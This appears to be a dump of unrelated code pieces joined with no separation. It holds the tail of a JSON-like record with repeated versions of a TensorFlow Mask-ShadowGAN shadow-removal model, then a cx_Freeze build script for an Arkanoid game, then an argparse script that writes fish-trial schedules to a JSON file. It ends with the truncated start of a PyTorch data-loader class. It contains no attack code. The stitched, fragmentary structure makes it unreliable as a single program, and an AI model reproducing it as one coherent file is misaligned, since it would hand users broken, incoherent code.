init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = 
self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n starter_learning_rate = self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = tf.where(tf.greater_equal(global_step,\n start_decay_step), tf.train.polynomial_decay(\n starter_learning_rate, global_step - start_decay_step,\n decay_steps, end_learning_rate, power=1.0),\n starter_learning_rate)\n learning_step = tf.train.AdamOptimizer(learning_rate, beta1=\n beta1, name=name).minimize(loss, global_step=global_step,\n var_list=variables)\n return learning_step\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.\n variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name=\n 'Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name=\n 'Adam_D_B')\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer,\n 
D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-4": "import tensorflow as tf\nfrom models.base_model import BaseModel\nfrom utils.im_utils import batch_convert_2_int\nfrom datasets.single_dataset import SingleDataset\nfrom datasets.unpaired_dataset import UnpairedDataset\nfrom models.generators.maskshadowgan_generators import Generator\nfrom models.discriminators.maskshadowgan_discriminators import Discriminator\n\n\nclass MaskShadowGANModel(BaseModel):\n \"\"\"\n Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.\n\n A: shadow images domain\n B: shadow free images domain\n\n Paper: https://arxiv.org/pdf/1903.10683.pdf\n \"\"\"\n\n def __init__(self, opt, training):\n BaseModel.__init__(self, opt, training)\n self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.\n batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size,\n self.opt.crop_size, self.opt.crop_size, 1])\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache',\n cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n return dataA_iter, dataB_iter, dataA_iter.get_next(\n ), dataB_iter.get_next()\n else:\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain, training\n =self.training, name='G')\n if self.training:\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.\n weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.\n opt.ndf, norm_type=self.opt.layer_norm_type, init_type=self\n .opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='D_B')\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n reconstructedA = self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n 
tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(\n reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(\n reconstructedB))\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB,\n reconstructedA, reconstructedB, identA, identB)\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else:\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA,\n identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) +\n tf.reduce_mean(tf.square(D(fake))))\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.\n realA)) + self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB -\n self.realB))\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.\n abs(identB - self.realA)) + self.opt.lamB * tf.reduce_mean(tf.\n abs(identA - self.realB)))\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n starter_learning_rate = self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = tf.where(tf.greater_equal(global_step,\n start_decay_step), tf.train.polynomial_decay(\n starter_learning_rate, global_step - start_decay_step,\n decay_steps, end_learning_rate, power=1.0),\n starter_learning_rate)\n learning_step = tf.train.AdamOptimizer(learning_rate, beta1=\n beta1, name=name).minimize(loss, 
global_step=global_step,\n var_list=variables)\n return learning_step\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.\n variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name=\n 'Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name=\n 'Adam_D_B')\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer,\n D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-5": "import tensorflow as tf\nfrom models.base_model import BaseModel\nfrom utils.im_utils import batch_convert_2_int\nfrom datasets.single_dataset import SingleDataset\nfrom datasets.unpaired_dataset import UnpairedDataset\nfrom models.generators.maskshadowgan_generators import Generator\nfrom models.discriminators.maskshadowgan_discriminators import Discriminator\n\n\nclass MaskShadowGANModel(BaseModel):\n \"\"\"\n Implementation of Mask-ShadowGAN model for shadow removal of unpaired data.\n\n A: shadow images domain\n B: shadow free images domain\n\n Paper: https://arxiv.org/pdf/1903.10683.pdf\n \"\"\"\n def __init__(self, opt, training):\n BaseModel.__init__(self, opt, training)\n\n # create placeholders for images and shadow masks\n self.realA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.realB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeA = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.fakeB = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, self.opt.channels])\n self.rand_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.last_mask = tf.placeholder(tf.float32, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n self.mask_non_shadow = tf.constant(-1.0, shape=[self.opt.batch_size, self.opt.crop_size, self.opt.crop_size, 1])\n\n def generate_dataset(self):\n \"\"\"\n Add ops for dataset loaders to graph\n \"\"\"\n if self.training:\n dataset = UnpairedDataset(self.opt, self.training)\n datasetA, datasetB = dataset.generate(cacheA='./dataA.tfcache', cacheB='./dataB.tfcache')\n dataA_iter = datasetA.make_initializable_iterator()\n dataB_iter = datasetB.make_initializable_iterator()\n\n return dataA_iter, dataB_iter, dataA_iter.get_next(), dataB_iter.get_next()\n else: # only need shadow dataset for testing\n dataset = SingleDataset(self.opt, self.training)\n datasetA = dataset.generate()\n dataA_iter = datasetA.make_initializable_iterator()\n\n return dataA_iter, dataA_iter.get_next()\n\n def build(self):\n \"\"\"\n Build TensorFlow graph for MaskShadowGAN model.\n \"\"\"\n # add ops for generator (A->B) to graph\n self.G = Generator(channels=self.opt.channels, ngf=self.opt.ngf, norm_type=self.opt.layer_norm_type,\n init_type=self.opt.weight_init_type, init_gain=self.opt.weight_init_gain,\n training=self.training, name='G')\n\n if self.training:\n # add ops for other generator (B->A) and discriminators to graph\n self.F = Generator(channels=self.opt.channels, ngf=self.opt.ngf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,\n init_gain=self.opt.weight_init_gain, training=self.training, name='F')\n self.D_A = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,\n init_gain=self.opt.weight_init_gain, training=self.training, name='D_A')\n self.D_B = Discriminator(channels=self.opt.channels, ndf=self.opt.ndf,\n norm_type=self.opt.layer_norm_type, init_type=self.opt.weight_init_type,\n init_gain=self.opt.weight_init_gain, training=self.training, name='D_B')\n\n # generate fake images\n fakeB = self.G(self.realA)\n fakeA = self.F(self.realB, self.rand_mask)\n\n # generate reconstructed images\n reconstructedA = 
self.F(fakeB, self.last_mask)\n reconstructedB = self.G(fakeA)\n\n # generate identity mapping images\n identA = self.G(self.realB)\n identB = self.F(self.realA, self.mask_non_shadow)\n\n tf.summary.image('A/original', batch_convert_2_int(self.realA))\n tf.summary.image('B/original', batch_convert_2_int(self.realB))\n tf.summary.image('A/generated', batch_convert_2_int(fakeA))\n tf.summary.image('B/generated', batch_convert_2_int(fakeB))\n tf.summary.image('A/reconstructed', batch_convert_2_int(reconstructedA))\n tf.summary.image('B/reconstructed', batch_convert_2_int(reconstructedB))\n\n # add loss ops to graph\n Gen_loss, D_A_loss, D_B_loss = self.__loss(fakeA, fakeB, reconstructedA,\n reconstructedB, identA, identB)\n\n # add optimizer ops to graph\n optimizers = self.__optimizers(Gen_loss, D_A_loss, D_B_loss)\n\n return fakeA, fakeB, optimizers, Gen_loss, D_A_loss, D_B_loss\n else: # only need generator from A->B during testing\n fakeB = self.G(self.realA)\n return fakeB\n\n def __loss(self, fakeA, fakeB, reconstructedA, reconstructedB, identA, identB):\n \"\"\"\n Compute the losses for the generators and discriminators.\n \"\"\"\n # compute the generators loss\n G_loss = self.__G_loss(self.D_B, fakeB)\n F_loss = self.__G_loss(self.D_A, fakeA)\n cc_loss = self.__cycle_consistency_loss(reconstructedA, reconstructedB)\n ident_loss = self.__identity_loss(identA, identB)\n Gen_loss = G_loss + F_loss + cc_loss + ident_loss\n\n # Compute the disciminators loss. Use fake images from image pool to improve stability\n D_A_loss = self.__D_loss(self.D_A, self.realA, self.fakeA)\n D_B_loss = self.__D_loss(self.D_B, self.realB, self.fakeB)\n\n return Gen_loss, D_A_loss, D_B_loss\n\n def __D_loss(self, D, real, fake):\n \"\"\"\n Compute the discriminator loss.\n\n (MSE Loss):\n L_disc = 0.5 * [Expectation of (D(B) - 1)^2 + Expectation of (D(G(A)))^2]\n \"\"\"\n loss = 0.5 * (tf.reduce_mean(tf.squared_difference(D(real), 1.0)) + \\\n tf.reduce_mean(tf.square(D(fake))))\n\n return loss\n\n def __G_loss(self, D, fake):\n \"\"\"\n Compute the generator loss.\n\n (MSE Loss):\n L_gen = Expectation of (D(G(A)) - 1)^2\n \"\"\"\n loss = tf.reduce_mean(tf.squared_difference(D(fake), 1.0))\n\n return loss\n\n def __cycle_consistency_loss(self, reconstructedA, reconstructedB):\n \"\"\"\n Compute the cycle consistenty loss.\n\n L_cyc = lamA * [Expectation of L1_norm(F(G(A)) - A)] +\n lamb * [Expectation of L1_norm(G(F(B)) - B)]\n \"\"\"\n loss = self.opt.lamA * tf.reduce_mean(tf.abs(reconstructedA - self.realA)) + \\\n self.opt.lamB * tf.reduce_mean(tf.abs(reconstructedB - self.realB))\n\n return loss\n\n def __identity_loss(self, identA, identB):\n \"\"\"\n Compute the identity loss.\n\n L_idt = lamda_idt * [lamA * [Expectation of L1_norm(F(A) - A)] +\n lamB * [Expectation of L1_norm(G(B) - B)]]\n \"\"\"\n loss = self.opt.lambda_ident * (self.opt.lamA * tf.reduce_mean(tf.abs(identB - self.realA)) + \\\n self.opt.lamB * tf.reduce_mean(tf.abs(identA - self.realB)))\n\n return loss\n\n def __optimizers(self, Gen_loss, D_A_loss, D_B_loss):\n \"\"\"\n Modified optimizer taken from vanhuyz TensorFlow implementation of CycleGAN\n https://github.com/vanhuyz/CycleGAN-TensorFlow/blob/master/model.py\n \"\"\"\n def make_optimizer(loss, variables, name='Adam'):\n \"\"\" Adam optimizer with learning rate 0.0002 for the first 100k steps (~100 epochs)\n and a linearly decaying rate that goes to zero over the next 100k steps\n \"\"\"\n global_step = tf.Variable(0, trainable=False, name='global_step')\n starter_learning_rate = 
self.opt.lr\n end_learning_rate = 0.0\n start_decay_step = self.opt.niter\n decay_steps = self.opt.niter_decay\n beta1 = self.opt.beta1\n learning_rate = (tf.where(tf.greater_equal(global_step, start_decay_step),\n tf.train.polynomial_decay(starter_learning_rate,\n global_step-start_decay_step,\n decay_steps, end_learning_rate,\n power=1.0),\n starter_learning_rate))\n\n learning_step = (tf.train.AdamOptimizer(learning_rate, beta1=beta1, name=name)\n .minimize(loss, global_step=global_step, var_list=variables))\n\n return learning_step\n\n Gen_optimizer = make_optimizer(Gen_loss, self.G.variables + self.F.variables, name='Adam_Gen')\n D_A_optimizer = make_optimizer(D_A_loss, self.D_A.variables, name='Adam_D_A')\n D_B_optimizer = make_optimizer(D_B_loss, self.D_B.variables, name='Adam_D_B')\n\n with tf.control_dependencies([Gen_optimizer, D_A_optimizer, D_B_optimizer]):\n return tf.no_op(name='optimizers')\n",
"step-ids": [
8,
9,
11,
12,
13
]
}
|
[
8,
9,
11,
12,
13
] |
# Run 'python setup.py build' on cmd
import sys
from cx_Freeze import setup, Executable
import os.path
PYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))
os.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')
os.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')
options = {
'build_exe': {
'include_files': [
'bg_music.wav',
],
'path': sys.path + ['modules']
}
}
executables = [
Executable('game.py')
]
setup(name='Arkanoid',
version='1.0',
description='Python Game',
options=options,
executables=executables
)
|
normal
|
{
"blob_id": "f317d67b98eab1f0f192fa41f9bcc32b0c1e8eb0",
"index": 8301,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='Arkanoid', version='1.0', description='Python Game', options=\n options, executables=executables)\n",
"step-3": "<mask token>\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\noptions = {'build_exe': {'include_files': ['bg_music.wav'], 'path': sys.\n path + ['modules']}}\nexecutables = [Executable('game.py')]\nsetup(name='Arkanoid', version='1.0', description='Python Game', options=\n options, executables=executables)\n",
"step-4": "import sys\nfrom cx_Freeze import setup, Executable\nimport os.path\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\noptions = {'build_exe': {'include_files': ['bg_music.wav'], 'path': sys.\n path + ['modules']}}\nexecutables = [Executable('game.py')]\nsetup(name='Arkanoid', version='1.0', description='Python Game', options=\n options, executables=executables)\n",
"step-5": "# Run 'python setup.py build' on cmd\r\n\r\nimport sys\r\nfrom cx_Freeze import setup, Executable\r\n\r\nimport os.path\r\nPYTHON_INSTALL_DIR = os.path.dirname(os.path.dirname(os.__file__))\r\nos.environ['TCL_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tcl8.6')\r\nos.environ['TK_LIBRARY'] = os.path.join(PYTHON_INSTALL_DIR, 'tcl', 'tk8.6')\r\n\r\noptions = {\r\n 'build_exe': {\r\n 'include_files': [\r\n 'bg_music.wav',\r\n ],\r\n 'path': sys.path + ['modules']\r\n }\r\n}\r\n\r\nexecutables = [\r\n Executable('game.py')\r\n]\r\n\r\nsetup(name='Arkanoid',\r\n version='1.0',\r\n description='Python Game',\r\n options=options,\r\n executables=executables\r\n )\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import json
import argparse
import sys
import os
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument("-sd","--startdate", help="Date to start scheduling trials, format is MM/DD.", required=True)
ap.add_argument("-r", "--round",help="A number.", required=True)
ap.add_argument("-hs", "--hsched", help="Which high schedule to use (e.g. H1, H2, H3)", required=True)
ap.add_argument("-ls", "--lsched", help="Which low schedule to use (e.g. H1, H2, H3)", required=True)
ap.add_argument("-h1", "--hfish1", help="1st Fish that will be assigned H schedule", required=True)
ap.add_argument("-h2", "--hfish2", help="2nd Fish that will be assigned H schedule", required=True)
ap.add_argument("-h3", "--hfish3", help="3rd Fish that will be assigned H schedule", required=True)
ap.add_argument("-l1", "--lfish1", help="1st Fish that will be assigned L schedule", required=True)
ap.add_argument("-l2", "--lfish2", help="2nd Fish that will be assigned L schedule", required=True)
ap.add_argument("-l3", "--lfish3", help="3rd Fish that will be assigned L schedule", required=True)
args = vars(ap.parse_args())
a_dict = {"startDate": args["startdate"], "round": args["round"], "h_schedule": args["hsched"], "l_schedule": args["lsched"], "mapping": {"H": { "fish1" : args["hfish1"], "fish2": args["hfish2"], "fish3": args["hfish3"]}, "L": { "fish1" : args["lfish1"], "fish2": args["lfish2"], "fish3": args["lfish3"]}}}
#print a_dict
    if os.path.exists('top.json'):
        os.remove('top.json')
with open('top.json', 'w') as f:
json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))
sys.exit(0)
|
normal
|
{
"blob_id": "e4767d8a4991a1180cc185c4c2d77104d63f9c7a",
"index": 6858,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('-sd', '--startdate', help=\n 'Date to start scheduling trials, format is MM/DD.', required=True)\n ap.add_argument('-r', '--round', help='A number.', required=True)\n ap.add_argument('-hs', '--hsched', help=\n 'Which high schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-ls', '--lsched', help=\n 'Which low schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-h1', '--hfish1', help=\n '1st Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h2', '--hfish2', help=\n '2nd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h3', '--hfish3', help=\n '3rd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-l1', '--lfish1', help=\n '1st Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l2', '--lfish2', help=\n '2nd Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l3', '--lfish3', help=\n '3rd Fish that will be assigned L schedule', required=True)\n args = vars(ap.parse_args())\n a_dict = {'startDate': args['startdate'], 'round': args['round'],\n 'h_schedule': args['hsched'], 'l_schedule': args['lsched'],\n 'mapping': {'H': {'fish1': args['hfish1'], 'fish2': args['hfish2'],\n 'fish3': args['hfish3']}, 'L': {'fish1': args['lfish1'], 'fish2':\n args['lfish2'], 'fish3': args['lfish3']}}}\n os.remove('top.json')\n with open('top.json', 'w') as f:\n json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))\n sys.exit(0)\n",
"step-3": "import json\nimport argparse\nimport sys\nimport os\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('-sd', '--startdate', help=\n 'Date to start scheduling trials, format is MM/DD.', required=True)\n ap.add_argument('-r', '--round', help='A number.', required=True)\n ap.add_argument('-hs', '--hsched', help=\n 'Which high schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-ls', '--lsched', help=\n 'Which low schedule to use (e.g. H1, H2, H3)', required=True)\n ap.add_argument('-h1', '--hfish1', help=\n '1st Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h2', '--hfish2', help=\n '2nd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-h3', '--hfish3', help=\n '3rd Fish that will be assigned H schedule', required=True)\n ap.add_argument('-l1', '--lfish1', help=\n '1st Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l2', '--lfish2', help=\n '2nd Fish that will be assigned L schedule', required=True)\n ap.add_argument('-l3', '--lfish3', help=\n '3rd Fish that will be assigned L schedule', required=True)\n args = vars(ap.parse_args())\n a_dict = {'startDate': args['startdate'], 'round': args['round'],\n 'h_schedule': args['hsched'], 'l_schedule': args['lsched'],\n 'mapping': {'H': {'fish1': args['hfish1'], 'fish2': args['hfish2'],\n 'fish3': args['hfish3']}, 'L': {'fish1': args['lfish1'], 'fish2':\n args['lfish2'], 'fish3': args['lfish3']}}}\n os.remove('top.json')\n with open('top.json', 'w') as f:\n json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))\n sys.exit(0)\n",
"step-4": "import json\nimport argparse\nimport sys\nimport os\n\nif __name__ == '__main__':\n\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-sd\",\"--startdate\", help=\"Date to start scheduling trials, format is MM/DD.\", required=True)\n ap.add_argument(\"-r\", \"--round\",help=\"A number.\", required=True)\n ap.add_argument(\"-hs\", \"--hsched\", help=\"Which high schedule to use (e.g. H1, H2, H3)\", required=True)\n ap.add_argument(\"-ls\", \"--lsched\", help=\"Which low schedule to use (e.g. H1, H2, H3)\", required=True)\n ap.add_argument(\"-h1\", \"--hfish1\", help=\"1st Fish that will be assigned H schedule\", required=True)\n ap.add_argument(\"-h2\", \"--hfish2\", help=\"2nd Fish that will be assigned H schedule\", required=True)\n ap.add_argument(\"-h3\", \"--hfish3\", help=\"3rd Fish that will be assigned H schedule\", required=True)\n ap.add_argument(\"-l1\", \"--lfish1\", help=\"1st Fish that will be assigned L schedule\", required=True)\n ap.add_argument(\"-l2\", \"--lfish2\", help=\"2nd Fish that will be assigned L schedule\", required=True)\n ap.add_argument(\"-l3\", \"--lfish3\", help=\"3rd Fish that will be assigned L schedule\", required=True)\n\n args = vars(ap.parse_args())\n\n a_dict = {\"startDate\": args[\"startdate\"], \"round\": args[\"round\"], \"h_schedule\": args[\"hsched\"], \"l_schedule\": args[\"lsched\"], \"mapping\": {\"H\": { \"fish1\" : args[\"hfish1\"], \"fish2\": args[\"hfish2\"], \"fish3\": args[\"hfish3\"]}, \"L\": { \"fish1\" : args[\"lfish1\"], \"fish2\": args[\"lfish2\"], \"fish3\": args[\"lfish3\"]}}}\n\n #print a_dict\n\n os.remove('top.json')\n\n with open('top.json', 'w') as f:\n json.dump(a_dict, f, sort_keys=True, indent=4, separators=(',', ': '))\n\n sys.exit(0)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import cv2
import numpy as np
import torch
import torch.utils.data
import torchvision
from torchvision import transforms
from utils.utils import loadYaml
from .base_datalayer import BaseDataLayer
import albumentations as albu
class Datalayer(BaseDataLayer):
def __init__(self, config, augmentation=None, preprocessing=None):
super(Datalayer, self).__init__()
self.config = config
train_dir = self.config['Dataset']['TrainPath']
bg_imgs_dir = os.path.join(train_dir, 'bg')
